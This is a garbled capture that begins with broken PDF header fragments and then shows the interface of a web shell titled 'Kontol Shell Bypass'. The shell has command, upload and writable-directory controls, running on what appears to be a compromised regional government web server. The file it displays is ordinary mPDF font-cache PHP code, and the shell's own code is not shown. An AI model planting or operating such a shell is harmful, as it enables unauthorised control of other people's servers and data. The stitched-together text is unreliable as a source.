%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/mpdf/mpdf/src/Fonts/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/mpdf/mpdf/src/Fonts/FontCache.php
<?php

namespace Mpdf\Fonts;

use Mpdf\Cache;

class FontCache
{

	private $memoryCache = [];

	private $cache;

	public function __construct(Cache $cache)
	{
		$this->cache = $cache;
	}

	public function tempFilename($filename)
	{
		return $this->cache->tempFilename($filename);
	}

	public function has($filename)
	{
		return $this->cache->has($filename);
	}

	public function jsonHas($filename)
	{
		return (isset($this->memoryCache[$filename]) || $this->has($filename));
	}

	public function load($filename)
	{
		return $this->cache->load($filename);
	}

	public function jsonLoad($filename)
	{
		if (isset($this->memoryCache[$filename])) {
			return $this->memoryCache[$filename];
		}

		$this->memoryCache[$filename] = json_decode($this->load($filename), true);
		return $this->memoryCache[$filename];
	}

	public function write($filename, $data)
	{
		return $this->cache->write($filename, $data);
	}

	public function binaryWrite($filename, $data)
	{
		return $this->cache->write($filename, $data);
	}

	public function jsonWrite($filename, $data)
	{
		return $this->cache->write($filename, json_encode($data));
	}

	public function remove($filename)
	{
		return $this->cache->remove($filename);
	}

	public function jsonRemove($filename)
	{
		if (isset($this->memoryCache[$filename])) {
			unset($this->memoryCache[$filename]);
		}

		$this->remove($filename);
	}
}

Kontol Shell Bypass